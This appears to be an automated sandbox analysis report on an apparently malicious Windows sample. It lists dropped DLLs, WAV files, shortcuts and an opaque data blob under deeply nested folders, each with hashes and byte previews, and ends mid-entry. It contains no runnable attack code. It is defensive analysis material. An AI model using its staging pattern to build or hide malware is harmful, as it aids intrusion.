                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./@t.k!..k!..k!..9T..l!.. Y..l!..k!..x!...T..o!...T..j!...T..j!...T..j!..Richk!..........................PE..L.....c.........."!....."...................@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...+!.......".................. ..`.rdata.......@.......&..............@..@.data...D....P.......*..............@....reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll

                  Download File
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):11776
                  Entropy (8bit):6.024446974480565
                  Encrypted:false
                  SSDEEP:192:Vm9rQDenC9VrcK7REgSWOprANupQYLRszDDH/d9CWlXo7U6Wxf:QJQEaVAK7R9SfpjpQYLRszfH/d9CWB1j
                  MD5:E23600029D1B09BDB1D422FB4E46F5A6
                  SHA1:5D64A2F6A257A98A689A3DB9A087A0FD5F180096
                  SHA-256:7342B73593B3AA1B15E3731BFB1AFD1961802A5C66343BAC9A2C737EE94F4E38
                  SHA-512:C971F513142633CE0E6EC6A04C754A286DA8016563DAB368C3FAC83AEF81FA3E9DF1003C4B63D00A46351A9D18EAA7AE7645CAEF172E5E1D6E29123AB864E7AC
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./@t.k!..k!..k!..9T..l!.. Y..l!..k!..x!...T..o!...T..j!...T..j!...T..j!..Richk!..........................PE..L.....c.........."!....."...................@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...+!.......".................. ..`.rdata.......@.......&..............@..@.data...D....P.......*..............@....reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\TEPO0015922.LNK

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:59 2022, mtime=Tue Mar 8 15:45:59 2022, atime=Sat Mar 18 11:34:15 2023, length=248144, window=hide
                  Category:dropped
                  Size (bytes):1019
                  Entropy (8bit):4.5488977700317035
                  Encrypted:false
                  SSDEEP:24:8oE3k/XT89dqPplqMNef/1+WDv3q+cX7cY:8osk/XTko7NC/a+Kl
                  MD5:A437967E1061678D0FF0E50870435957
                  SHA1:BC5F02EA09D07829F2B9C03F75C515911240F215
                  SHA-256:DBFCEDA42BC9CC0A58EC27B58946233256391507B83DC57643D12AFDE3F2EB6A
                  SHA-512:CA679DA91B7459CCFFCAF1AA47589FF7E55A6A06F8155A9E8540AC7D50C7FDDFC6CADFFA92162733816FC0A1947167F15191808CE9854ED52697D7F7A0627FFE
                  Malicious:false
                  Preview:L..................F.... .....k..3....k..3...@..Y..P............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT...Desktop.d......QK.XhT.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.P...rVHd .TEPO00~1.DOC..L......hT..hT..*...r.....'...............T.E.P.O.0.0.1.5.9.2.2...d.o.c.......y...............-...8...[............?J......C:\Users\..#...................\\061544\Users.user\Desktop\TEPO0015922.doc.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.T.E.P.O.0.0.1.5.9.2.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......061544..........D_....3N...W...9I..N..... .....[D_....3N...W...9I

                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:Generic INItialization configuration [doc]
                  Category:dropped
                  Size (bytes):73
                  Entropy (8bit):4.708249518901646
                  Encrypted:false
                  SSDEEP:3:bDuMJlpwxXpulmX1mzXpulv:bCiwRpur7pu1
                  MD5:171A06F44A4A1DF6E94542EC2401B637
                  SHA1:0CBD760BE24649A735405B819571C0FA21DD4FE3
                  SHA-256:E9570E3F648D804D3339EE4C51DD2E09E45213D17E5AED1A608264BE1C62AAFD
                  SHA-512:999E5638639B4028DBB7BFFD2901EC0D1028E96766C469F445F9CB518B3160E57ADEDDA18C42CC25AAF870FE008B289E3ECAA6B241D4F4FD503AC3B891355943
                  Malicious:false
                  Preview:[folders]..Templates.LNK=0..TEPO0015922.LNK=0..[doc]..TEPO0015922.LNK=0..

                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):162
                  Entropy (8bit):2.503835550707525
                  Encrypted:false
                  SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                  MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                  SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                  SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                  SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                  Malicious:false
                  Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

                  C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                  Category:dropped
                  Size (bytes):2
                  Entropy (8bit):1.0
                  Encrypted:false
                  SSDEEP:3:Qn:Qn
                  MD5:F3B25701FE362EC84616A93A45CE9998
                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                  Malicious:false
                  Preview:..

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0TIZ5KP0HTH2PPHMB9S2.temp

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8016
                  Entropy (8bit):3.584171275091943
                  Encrypted:false
                  SSDEEP:96:chQCNAPXMqsqvsqvJCwo0z8hQCNAPXMqsqvsEHyqvJCworezsKPrYpHXyuyrBKPo:coflo0z8oftHnorezsKMd+BK+jp
                  MD5:8C1FC95796F285E35E3C114072F0994C
                  SHA1:3CAE37018D6EFC898DDB912819FAF0110D2ED9F3
                  SHA-256:68860048B5C059DB735F63FA816E73825F5AFBBDF89793BAB0C97A18B1192129
                  SHA-512:013E04827C7E278D5D1C77DCB0F469DCD7B83137EA8EC5B450DCADBFC0DD327E3E13DBD7BE6C4840D1F10916319490E6152B99A8C53669277DBEDED202DC1965
                  Malicious:false
                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8016
                  Entropy (8bit):3.584171275091943
                  Encrypted:false
                  SSDEEP:96:chQCNAPXMqsqvsqvJCwo0z8hQCNAPXMqsqvsEHyqvJCworezsKPrYpHXyuyrBKPo:coflo0z8oftHnorezsKMd+BK+jp
                  MD5:8C1FC95796F285E35E3C114072F0994C
                  SHA1:3CAE37018D6EFC898DDB912819FAF0110D2ED9F3
                  SHA-256:68860048B5C059DB735F63FA816E73825F5AFBBDF89793BAB0C97A18B1192129
                  SHA-512:013E04827C7E278D5D1C77DCB0F469DCD7B83137EA8EC5B450DCADBFC0DD327E3E13DBD7BE6C4840D1F10916319490E6152B99A8C53669277DBEDED202DC1965
                  Malicious:false
                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF501bcb.TMP (copy)

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8016
                  Entropy (8bit):3.584171275091943
                  Encrypted:false
                  SSDEEP:96:chQCNAPXMqsqvsqvJCwo0z8hQCNAPXMqsqvsEHyqvJCworezsKPrYpHXyuyrBKPo:coflo0z8oftHnorezsKMd+BK+jp
                  MD5:8C1FC95796F285E35E3C114072F0994C
                  SHA1:3CAE37018D6EFC898DDB912819FAF0110D2ED9F3
                  SHA-256:68860048B5C059DB735F63FA816E73825F5AFBBDF89793BAB0C97A18B1192129
                  SHA-512:013E04827C7E278D5D1C77DCB0F469DCD7B83137EA8EC5B450DCADBFC0DD327E3E13DBD7BE6C4840D1F10916319490E6152B99A8C53669277DBEDED202DC1965
                  Malicious:false
                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF504a59.TMP (copy)

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8016
                  Entropy (8bit):3.584171275091943
                  Encrypted:false
                  SSDEEP:96:chQCNAPXMqsqvsqvJCwo0z8hQCNAPXMqsqvsEHyqvJCworezsKPrYpHXyuyrBKPo:coflo0z8oftHnorezsKMd+BK+jp
                  MD5:8C1FC95796F285E35E3C114072F0994C
                  SHA1:3CAE37018D6EFC898DDB912819FAF0110D2ED9F3
                  SHA-256:68860048B5C059DB735F63FA816E73825F5AFBBDF89793BAB0C97A18B1192129
                  SHA-512:013E04827C7E278D5D1C77DCB0F469DCD7B83137EA8EC5B450DCADBFC0DD327E3E13DBD7BE6C4840D1F10916319490E6152B99A8C53669277DBEDED202DC1965
                  Malicious:false
                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9YQ9PYJ6KG059DAWKHEY.temp

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8016
                  Entropy (8bit):3.584171275091943
                  Encrypted:false
                  SSDEEP:96:chQCNAPXMqsqvsqvJCwo0z8hQCNAPXMqsqvsEHyqvJCworezsKPrYpHXyuyrBKPo:coflo0z8oftHnorezsKMd+BK+jp
                  MD5:8C1FC95796F285E35E3C114072F0994C
                  SHA1:3CAE37018D6EFC898DDB912819FAF0110D2ED9F3
                  SHA-256:68860048B5C059DB735F63FA816E73825F5AFBBDF89793BAB0C97A18B1192129
                  SHA-512:013E04827C7E278D5D1C77DCB0F469DCD7B83137EA8EC5B450DCADBFC0DD327E3E13DBD7BE6C4840D1F10916319490E6152B99A8C53669277DBEDED202DC1965
                  Malicious:false
                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YJUBHAZA5OF447Z3CQQ4.temp

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8016
                  Entropy (8bit):3.584171275091943
                  Encrypted:false
                  SSDEEP:96:chQCNAPXMqsqvsqvJCwo0z8hQCNAPXMqsqvsEHyqvJCworezsKPrYpHXyuyrBKPo:coflo0z8oftHnorezsKMd+BK+jp
                  MD5:8C1FC95796F285E35E3C114072F0994C
                  SHA1:3CAE37018D6EFC898DDB912819FAF0110D2ED9F3
                  SHA-256:68860048B5C059DB735F63FA816E73825F5AFBBDF89793BAB0C97A18B1192129
                  SHA-512:013E04827C7E278D5D1C77DCB0F469DCD7B83137EA8EC5B450DCADBFC0DD327E3E13DBD7BE6C4840D1F10916319490E6152B99A8C53669277DBEDED202DC1965
                  Malicious:false
                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Anabiotic\Farvelgninger\Satires\Trumpet1.wav

                  Download File
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 11025 Hz
                  Category:dropped
                  Size (bytes):66112
                  Entropy (8bit):5.179999054900731
                  Encrypted:false
                  SSDEEP:1536:BXbR5BGcY3nVQkEwzmnOqF/Mkb2iqSfrlAjX6vDVp89XTnvMNa48XSdMo70BaXDM:DzbYbIc3/
                  MD5:25C91AD0CC8B70FCAC47A132879893EF
                  SHA1:6F842222085854C037FB3E83ABEF2A841CFEF932
                  SHA-256:C08AB0F702503A43090DF125191B8C6C84B163DF40FF077C9D5CD064E33E1B93
                  SHA-512:F418FB5223485C2C96AF4B286A7B11850BBF52F9DBFADA3FD9D979B60A196D53294D2225EC8860228F3A949FAA1DD61ED913341A74E1B3F60A9F7F30659B2155
                  Malicious:false
                  Preview:RIFF8...WAVEfmt .........+...+......data..............~.~...||}.........sv{...||}|{}}}..||zzyxw{.....n_nz~.|zzyxy|.....~}{|{zz......hgrz.~{yyvvy{.....yxz~}|}......oep{~}yxvvvx|~...|vw|...~}......i_jvxyxyvvvz}...~xy~....|yz.....zEXly{{yywtw|...........zvw.....{7Yo}|{{{vss{.....|.....xru~....^6`p~|xzyvrt}....|w}....zrt.....i3[n|{wx|yvt.....xv}....ztvz....a1^n.{vy.}wv.....yx|....ysw}...9Gkw.{t|.|vx.....yu~....{x{....3Sr~.{t|~{vz.....ww~....z|.....u;^v..zu|~{w}....|wy....}x.....MIiy..ww}}xx~....xvz....{z.....{AZp|.~vx}ywz....|vw.....~......`Rcv..{vvwy||....vw}.............wjo}.{opt{.....|xy|~...........}kjr|.~|}~|}|..~}..............|mkrz.~{x|~........}..........}}zxwwz{{xz~......~.}}.........z~||wvy}.~}}~.~}...............{{}zvsx}.~|}}~........}........~z|}{zy}~}|}......................~}zz}~.~...~...................}}zz|.....~}~..................~}~|~~...}}~........~..............|~~...~.}}.....................}}~....~~|~.....................~~~~..}}~|.......~..............~~...~}}.|.

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Anabiotic\Farvelgninger\Satires\ZedGraph.dll

                  Download File
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):297472
                  Entropy (8bit):5.872932743464719
                  Encrypted:false
                  SSDEEP:6144:8NBtNg2np1eFXhtBE/ByZD9Q9thDhauHiNOafnk:8NB74XhHE5yZDYDhasg
                  MD5:1A2D40F5C02CEEB8EB6CD94932B39130
                  SHA1:8C460E86ABDB90E157A5E2DB5D3D24F8D51DC516
                  SHA-256:8B6E649444A08D77DFD1FD646F6FCC2490EC222A2C1F8E633B08F9DC7A66458A
                  SHA-512:F0C9AB06B8F73087D2B2A098D73A6F246D5E2506CEF19B27A942DC40E87F542E42EDAA2D97500B9E5F430F763AA182E0F43F29A02B4C2015EDAFC2B7F90D3278
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Y...........!................n.... ........... ..............................kl....@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H...........X...................P .............................................v.{.8.e...hNi.8.?..A.....51...%.q.z...).+...S11Ko.O.R3.x.{..y.sT.|}....*....zx.0.C.]..v...g.|z.P=c.[..Qc...0.0.s.....{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*z.{........{........{.......*.*..#........#........~....~....~....(....*b...~....~....~....(....*n......~....~....~....(....*R....~....~....(....*..0..D........(......}.....~....}......}......}..

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Belysningsvsenerne\Kuneste\Hebraized\Overtegningerne\PSReadLine.format.ps1xml

                  Download File
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:HTML document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1245
                  Entropy (8bit):5.462849750105637
                  Encrypted:false
                  SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
                  MD5:5343C1A8B203C162A3BF3870D9F50FD4
                  SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
                  SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
                  SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
                  Malicious:false
                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Busafgange\Mekanismens\Boo.wav

                  Download File
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 11025 Hz
                  Category:dropped
                  Size (bytes):80844
                  Entropy (8bit):6.256034406762346
                  Encrypted:false
                  SSDEEP:1536:YZJEZfE9Igi5zpy1dBpYb9CAW/NDvvhDfrQ4ZzgOlhwTMxQrvIJ7KJ6hxU/S9N2u:8GM9Tkzpy1d4b/W/JvhjrDDhwTsQrinB
                  MD5:C1B6BDA7931C1FE99589D7A9D0A0223E
                  SHA1:FA22FFD9FAE116EEEBC487B7F9DBC794FA180CBC
                  SHA-256:7E62946949E6982633ECF3C5A67121C6A101407E6DEB6C01D21A97344175ACC5
                  SHA-512:F0056CD015E7476A55A9B4F5C26D588332C1261D083762EFBAC875475ECB15E97521F2214088798D754F38D15BC080F046D10C68727BC533F6F51DA3A89BF087
                  Malicious:false
                  Preview:RIFF.;..WAVEfmt .........+...+......data.;.....~...~~~............zupty.......}z}{ws}......~x.......rlpwwvz..zy}......mgltz|...rv......}kY^}.......o_Yr....}bW]o.....}l\[f.....whaVYep}.....x.......|b]b^`t.....~yictyst|}sv............vS@H_w...........~iS\s.........l;.+Lf...........jQDH_w.........sdcp....}qoget..........rXGJTf......|gX[l..onucWi.....zmz.......}xwrz..yrs....l\blvtio~........x{ws....gccl.....vkoq~....zgRIUn........UVjokqzzjdz......}kXZgw.........zYSbox.............vy.xnx..w~....mMObmq..........~|..tprfRRbx......toy....yu..xfh}.....yqhmu|......{qnwtsy....sg^S_w.....`HUy....ocu.......wg\]^k........oXUi.........yeOGUn.......z......ufYj.......rswl]aow~..vnfhw......qO@Lk~.....}vst}~wZP]nw.........wcSKSm......hbnvxru|.|..............m[OZr...sfcr}.......qqror~.......pYXdv...znv.......ub^kw............xrkjt.......zquux|vkcaq.........smm`_q......pcw....{hQCX.......^]iv.{`Sdps.....rr|}}.....x...tx.zz...|\Sm......fh~.....{Y7:^......sj}...mi{}g]oy.......~..dQf.......|.......xfPUt...

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Busafgange\Mekanismens\Cricks.Mou

                  Download File
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):75820
                  Entropy (8bit):4.595608514165927
                  Encrypted:false
                  SSDEEP:1536:6BlrBeHUW0BV7mgDoDiTEy1ZRkLuHFcWtiG:6DVUUhBIsTxuLcFcWUG
                  MD5:563A22B0870A170122E7E6B12B1DC71B
                  SHA1:978953365D04DFA73DBBDDC19C1F51F65B467F9D
                  SHA-256:F0800C56C7CC987302235997ACC52FBBDC90913FEED800F19C7E6986A10EC158
                  SHA-512:53BF553889B4F279F924DC6652D823C4A19045D0D59262D65F00C4A85D72435DEF8CF7D4BBE235E61E7F5DDDEC1E0A6CB2D2CA42AAA570FB9CAFC8E66C299379
                  Malicious:false
                  Preview:..y.aa..............h................7......................!!.}}.......f.....wwww..................a.j.........###.........jjjjjjj.....bb........./....''.55555.......M........m.........K....y.%%........Q...........OOOO..1.;.........YY.^^^...............44...........HH.....b...............................R..!!.....HHH........@@@...ee.........................................::................sss.....++............Q............................mmm.............Z....R....................ll...{.....ee....~............J..5..............CC........... .CC..........`..|...=..........................qq.............QQQQ.K.........................................zzzz...................I.....l.............................__.........fff...dd......Z.''''....aa.......lll.H..............................................i.....tt.L...........%.............................333.....X.a............II........QQ.....gg...[[...................QQ....... ..@. ......55....f.. .....XXX.........?.tt.............RR.

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Busafgange\Mekanismens\License.rtf

                  Download File
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                  Category:dropped
                  Size (bytes):11546
                  Entropy (8bit):5.130157501525605
                  Encrypted:false
                  SSDEEP:192:55sVeiuEzHQl+HjJWIZVVJ7niRk1RMBwugS:55sVebEzHQl5IZVVMRk1QSS
                  MD5:E2AFC893A72C3734DF31362E0962B153
                  SHA1:A44727652E6C84A1268945AA2F454F5424503411
                  SHA-256:CB7E80F94168D4C8F267255567F7232FAAAA3062D743C2375C3B7ECAD1F9718C
